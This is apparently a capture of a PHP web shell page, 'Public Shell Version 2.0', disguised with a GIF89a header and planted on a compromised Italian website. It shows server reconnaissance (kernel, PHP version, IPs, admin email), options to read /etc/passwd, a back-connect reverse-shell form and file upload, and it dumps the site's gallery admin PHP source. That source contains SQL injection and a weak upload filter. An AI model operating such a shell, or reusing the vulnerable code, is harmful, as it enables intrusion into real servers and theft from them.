GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/admin/function/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/admin/function/gallery_old.php

<?php

//////////////////////////gallery
function inseriscis() {
	global $conn, $id;
	$sql = 'select * from gallery where gallery_id="' . $id . '"  ';
	$dati_gallery = mysql_query($sql) or die(mysql_error());
	$array_gallery = mysql_fetch_array($dati_gallery);
	$output = '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvas&id=' . $id . '" method="post">';
	$output .= '<h1>' . CARICA . ' ' . IMG . ' in Home Page</h1><br />';;
	$output .= '<a class="button" href="javascript:history.back()">' . BACK . '</a><br /><br />';
	$output .= '<label for="upload">File</label>&nbsp;';
	$output .= '<a class="button" id="show-option" href="#" title="JPG, BMP, PNG, GIF, TGA - Max 2Mb">info ยป</a><br /><br />';
	$output .= '<input type="file" id="upfile" name="upfile" /><br /><br />';
	$output .= '<label for="testo">' . DESC . ' (' . CHAR . ')</label><br />';
	$output .= '<textarea class="form-control" rows="3" id="testo" name="testo"></textarea><br /><br />';
	$output .= '<label for="rank">' . RANK . '</label><br />';
	$output .= '<input class="ui-autocomplete-input" type="text" id="rank" name="rank" /><br /><br />';
	$output .= '<input type="submit" value="' . SALVA . '"/>';
	$output .= '</form>';
	return ($output);

}
 
function salvas() {
	global $conn, $id;
	$errore = 0;
	$testo = $_POST['testo'];
	$rank = $_POST['rank'];

	//	$miadata=$_POST['miadata'];
	$miadata = date("Y-m-d H:i:s");
	//	$upfile=$_POST['upfile'];
	$g = substr($miadata, 9, 2);
	$m = substr($miadata, 6, 2);
	$a = substr($miadata, 0, 4);
	$data = $a . '-' . $m . '-' . $g;

	if ($errore == 0) {
		if ($id == 0) {
			$sql = 'insert into gallery(gallery_testo,gallery_data,gallery_rank) values("' . $testo . '","' . $data . '","' . $rank . '")';
			header('location: index.php?ins&azione=listas');
			mysql_query($sql, $conn) or die(mysql_error());
			$id = mysql_insert_id(); 
		} else {
			$sql = 'update gallery set gallery_testo="' . $testo . '", gallery_rank="' . $rank . '" where gallery_id="' . $id . '" ';
			$output = 'Record aggiornato.<br /><a href="index.php?azione=listas">Torna alla lista</a>';
			mysql_query($sql, $conn) or die(mysql_error());
			header('location: index.php?agg&azione=listas');
		}
		//************************************upload
		if (is_uploaded_file($_FILES['upfile']['tmp_name'])) {
			$upload_dir = $_SERVER['DOCUMENT_ROOT'] . 'gallery/';
			//in produzione cambiare percorso!!
			if (!file_exists($upload_dir)) {mkdir($upload_dir);
			}

			$filename = $id . '_' . $_FILES['upfile']['name'];
			$estensioni_ammesse = array('.jpg', '.jpeg', '.gif', '.png', '.tga');
			$estensione = substr($filename, strpos($filename, '.') + 1, (strlen($filename) - strpos($filename, '.')));
			if (in_array($estensione, $estensioni_ammesse)) {
				move_uploaded_file($_FILES['upfile']['tmp_name'], $upload_dir . $filename);
				$sql = 'update gallery set gallery_file="' . $filename . '" where gallery_id=' . $id . ' ';
				mysql_query($sql);
			} else {echo 'error uploading';  
			}
		} 
 
	} else {$output = 'error.<br /><a href="javascript:history.go(-1)">Torna indietro</a>';
	}
	return ($output);
 
}
 

function listas() {
	global $conn, $id;
	$output = '<div class="left"><h1>' . LISTA . ' ' . PIC . ' in Home Page</h1></div><div class="right"><a class="button" href="?azione=inseriscis">Upload &raquo;</a></div>';
	$output .= '<table>';
	$output .= '<tr>
			<th>File</td>
			<th>' . DESC . '</td>
			<th>' . RANK . '</td>
			<th>' . MOD . '</td>
			<th>' . DELETE . '</td>
			</tr>';  
	$sql = 'select gallery_id, gallery_data, gallery_testo, gallery_file, gallery_rank from gallery order by gallery_rank asc ';
	$dati = mysql_query($sql, $conn) or die(mysql_error());
	if (mysql_num_rows($dati) > 0) {
 
		while ($array = mysql_fetch_array($dati)) {

				$output .= '<tr>';
				$output .= '<td><a href="../gallery/' . $array['gallery_file'] . '" class="lightbox"><img src="../gallery/' . $array['gallery_file'] . '"" width="30px" /></a></td>';
				$output .= '<td>' . $array['gallery_testo'] . '</td>';
				$output .= '<td>' . $array['gallery_rank'] . '</td>';
				$output .= '<td align="center"><a href="?azione=modificas&id=' . $array['gallery_id'] . '"><img src="../img/edit_f2.png" /></a></td>';
				$output .= '<td align="center"><a href="?azione=eliminas&id=' . $array['gallery_id'] . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><img src="../img/cancel_f2.png" /></a>';
				$output .= '</tr>'; 
	 

		}
  
	} else { 
 
		$output .= '<tr>';
		$output .= '<td>No file uploaded</td>';
		$output .= '</tr>';

	}
	$output .= '</table>';
	return ($output);
}

function modificas() {
	global $conn, $id;
	$sql = 'select * from gallery where gallery_id="' . $id . '"  ';
	$dati_gallery = mysql_query($sql) or die(mysql_error()); 
	$array_gallery = mysql_fetch_array($dati_gallery);
	$output = '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvas&id=' . $id . '" method="post">';
	$output .= '<span class="left"><h1>' . MOD . ' Slogan</h1></span>';
	$output .= '<span class="right"><a class="button" href="javascript:history.back()">' . BACK . '</a></span><br /><br />'; 
	$output .= '<div class="clear">';	
	$output .= '<label for="testo">' . DESC . ' (' . CHAR . ')</label><br />';
 	$output .= '<input type="text" id="testo" name="testo"  maxlength="270" value="' . $array_gallery['gallery_testo'] . '"><br /><br />';
	$output .= '<label for="rank">' . RANK . '</label><br />';
	$output .= '<input type="text" id="rank" style="width:30px" name="rank" value="' . $array_gallery['gallery_rank'] . '"/><br /><br />';

	$output .= '<input type="submit" value="' . SALVA . '"/><br /><br />';
	$output .= '</div>';
	$output .= '</form>';
	return ($output);
}

function eliminas() {
	global $conn, $id;

	$readfile = mysql_query('select *from gallery where gallery_id="' . $id . '"');
	while ($row = mysql_fetch_assoc($readfile)) {
		$file = $row['gallery_file'];
	}

	$dirname = $_SERVER['DOCUMENT_ROOT'] . 'gallery/' . $file . '';

	if (file_exists($dirname) && is_file($dirname)) {
		unlink($dirname);
	} elseif (is_dir($dirname)) {
		$handle = opendir($dirname);
		while (false !== ($file = readdir($handle))) {
			if (is_file($dirname . $file)) {
				unlink($dirname . $file);
			}
		}
		$handle = closedir($handle);
		rmdir($dirname);
	}
	$sql = 'delete from gallery where gallery_id="' . $id . '"';
	mysql_query($sql, $conn) or die(mysql_error());
	header('location: index.php?del&azione=listas');
}

?>

Public Shell Version 2.0